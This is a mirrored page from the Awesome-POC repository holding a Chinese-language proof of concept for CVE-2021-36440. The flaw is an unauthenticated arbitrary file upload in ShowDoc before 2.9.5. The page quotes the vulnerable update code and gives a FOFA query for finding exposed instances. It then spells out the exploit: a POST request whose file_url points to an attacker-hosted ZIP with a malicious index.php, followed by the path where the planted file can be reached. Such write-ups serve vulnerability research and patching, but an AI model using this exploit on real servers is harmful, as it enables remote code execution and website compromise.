admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 03:17:19 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/ShowDoc AdminUpdateController.class.php 任意文件上传漏洞 CVE-2021-36440.md
Threekiii cba0c4db58 更新漏洞
2022-12-05 11:09:28 +08:00

104 lines
3.3 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# ShowDoc AdminUpdateController.class.php 任意文件上传漏洞 CVE-2021-36440
## 漏洞描述
ShowDoc AdminUpdateController.class.php 文件中的更新部分代码没有鉴权且存在任意文件上传漏洞
## 漏洞影响
```
ShowDoc < V2.9.5
```
## FOFA
```
app="ShowDoc"
```
## 漏洞复现
登录页面
![image-20220524153008064](./images/202205241530123.png)
文件路径`server/Application/Api/Controller/AdminUpdateController.class.php`
![](./images/202205241530546.png)
```
public function download(){
set_time_limit(1000);
ini_set('memory_limit','500M');
$new_version = I("new_version") ;
$file_url = I("file_url") ;
$version_num = str_replace("v","",$new_version) ;
$showdoc_path = "../" ;
// 进行文件读写权限检查
if(!$this->new_is_writeable($showdoc_path)
|| !$this->new_is_writeable($showdoc_path."Sqlite/" )
|| !$this->new_is_writeable($showdoc_path."web/" )
|| !$this->new_is_writeable($showdoc_path."web/index.php" )
|| !$this->new_is_writeable($showdoc_path."server/" )
|| !$this->new_is_writeable($showdoc_path."server/vendor/autoload.php" )
|| !$this->new_is_writeable($showdoc_path."server/Application/Api" )
){
$this->sendError(10101,'请手动给showdoc安装目录下的所有文件可写权限否则程序无法覆盖旧文件');
return ;
}
$temp_dir = sys_get_temp_dir()."/showdoc_update/";
$zip_file = $temp_dir.'showdoc-'.$version_num.'.zip' ;
mkdir($temp_dir) ;
unlink($zip_file);
$file = file_get_contents($file_url);
file_put_contents($zip_file,$file);
$zip = new \ZipArchive();
$flag = $zip->open($zip_file);
if($flag!==true){
$this->sendError(10101,'下载更新压缩包失败');
return ;
}
$zip->extractTo($temp_dir);
$flag = $zip->close();
$zip_file_subpath = $temp_dir.'showdoc-'.$version_num."/" ;
if(file_exists($zip_file_subpath.'composer.json') && file_exists($zip_file_subpath.'web/index.php') && file_exists($zip_file_subpath.'server/vendor/autoload.php') ){
//echo $zip_file_subpath.'存在';
// 移动目录到upload/update
$this->copydir($zip_file_subpath ,$showdoc_path.'Public/Uploads/update/' );
$this->deldir($temp_dir);
$this->sendResult(array());
}else{
$this->sendError(10101,'下载更新压缩包后,解压的文件缺失');
return ;
}
}
```
这里可以看到 $file_url 参数可控可在任意URl下载 zip文件向后看看ZIP要求为需要存在部分文件
```
if(file_exists($zip_file_subpath.'composer.json') && file_exists($zip_file_subpath.'web/index.php') && file_exists($zip_file_subpath.'server/vendor/autoload.php') ){
```
制作ZIP包index.php 为恶意文件
![image-20220524153052669](./images/202205241530708.png)
发送请求包
```
POST /server/index.php?s=/api/adminUpdate/download
file_url=http://xxx.xxx.xxx:8888/showdoc-2.zip&new_version=2
```
![](./images/202205241531609.png)
访问上传的文件页面 `Public/Uploads/update/web/index.php`
Reference in New Issue View Git Blame Copy Permalink